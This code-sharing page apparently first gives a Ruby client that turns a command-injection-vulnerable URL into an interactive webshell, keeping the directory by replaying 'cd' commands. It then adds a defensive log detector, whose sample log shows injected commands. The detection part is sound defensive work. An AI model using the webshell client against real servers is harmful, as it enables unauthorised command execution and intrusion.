Last active March 2, 2016 14:30
Directory persistence hack for command-execution webshells
```ruby
# Simple directory-aware webshell hack
# Todo: get open-uri to co-operate with shell args for URLs
# For now, put the whole command-injection-vulnerable URL in the place indicated
# pls don't use for evil
require 'open-uri'
prefix = ""
command = "whoami"
while true
  print "> "
  command = gets.chomp
  exit if command == "exit"
  result = ""
  open("#{URLGOESHERE}"+URI::encode(prefix+command)) do |http|
    result = http.read
  end
  puts prefix+command
  #keep directory
  prefix += command+";" if command.include? "cd"
  puts "\n#{result}"
end
```
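Because the script replays every earlier `cd` as a `;`-joined prefix on each later request, the traffic it produces has a recognisable shape in web access logs. The following detector is an added example, not part of the original gist; the log lines, the `/diag` endpoint and the `host` parameter are constructed for illustration.

```ruby
require 'uri'

# Constructed sample access-log lines (not taken from the original page).
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [02/Mar/2016:14:30:01 +0000] "GET /diag?host=whoami HTTP/1.1" 200 12
  203.0.113.7 - - [02/Mar/2016:14:30:09 +0000] "GET /diag?host=cd%20/var/www HTTP/1.1" 200 0
  203.0.113.7 - - [02/Mar/2016:14:30:15 +0000] "GET /diag?host=cd%20/var/www;ls%20-la HTTP/1.1" 200 311
  203.0.113.7 - - [02/Mar/2016:14:30:31 +0000] "GET /diag?host=cd%20/var/www;cd%20uploads HTTP/1.1" 200 0
  203.0.113.7 - - [02/Mar/2016:14:30:40 +0000] "GET /diag?host=cd%20/var/www;cd%20uploads;id HTTP/1.1" 200 54
  198.51.100.4 - - [02/Mar/2016:14:31:02 +0000] "GET /diag?host=example.org HTTP/1.1" 200 88
  198.51.100.4 - - [02/Mar/2016:14:31:05 +0000] "GET /search?q=cd%20collection HTTP/1.1" 200 900
LOG

REQUEST = /\A(\S+) .*?"[A-Z]+ (\S+) HTTP/ # client IP and request target
CD = /\Acd\s+\S/                          # one "cd <dir>" shell segment

# Decode each query value and split it on ';' as a shell would.
def segment_lists(target)
  target.split('?', 2)[1].to_s.split('&').map do |pair|
    value = URI.decode_www_form_component(pair.split('=', 2)[1].to_s)
    value.split(';').map(&:strip)
  end
rescue ArgumentError # malformed percent-encoding: nothing to inspect
  []
end

# Returns { client_ip => [replayed cd chains] } for clients that sent a pure
# "cd ..." chain and later sent a longer value starting with that same chain.
# A lone "cd something" value that is never replayed is not flagged.
def replayed_cd_chains(log)
  seen = Hash.new { |h, k| h[k] = [] }
  hits = Hash.new { |h, k| h[k] = [] }
  log.each_line do |line|
    ip, target = line.match(REQUEST)&.captures
    next unless ip
    segment_lists(target).each do |segs|
      seen[ip].each do |chain|
        replay = segs.length > chain.length && segs.first(chain.length) == chain
        hits[ip] |= [chain.join(';')] if replay
      end
      seen[ip] << segs if !segs.empty? && segs.all? { |s| s.match?(CD) }
    end
  end
  hits
end

replayed_cd_chains(SAMPLE_LOG).each { |ip, chains| puts "#{ip}: #{chains.inspect}" }
```

The detector only sees what reaches the access log, so the same commands sent in a POST body would need body logging or a WAF rule instead.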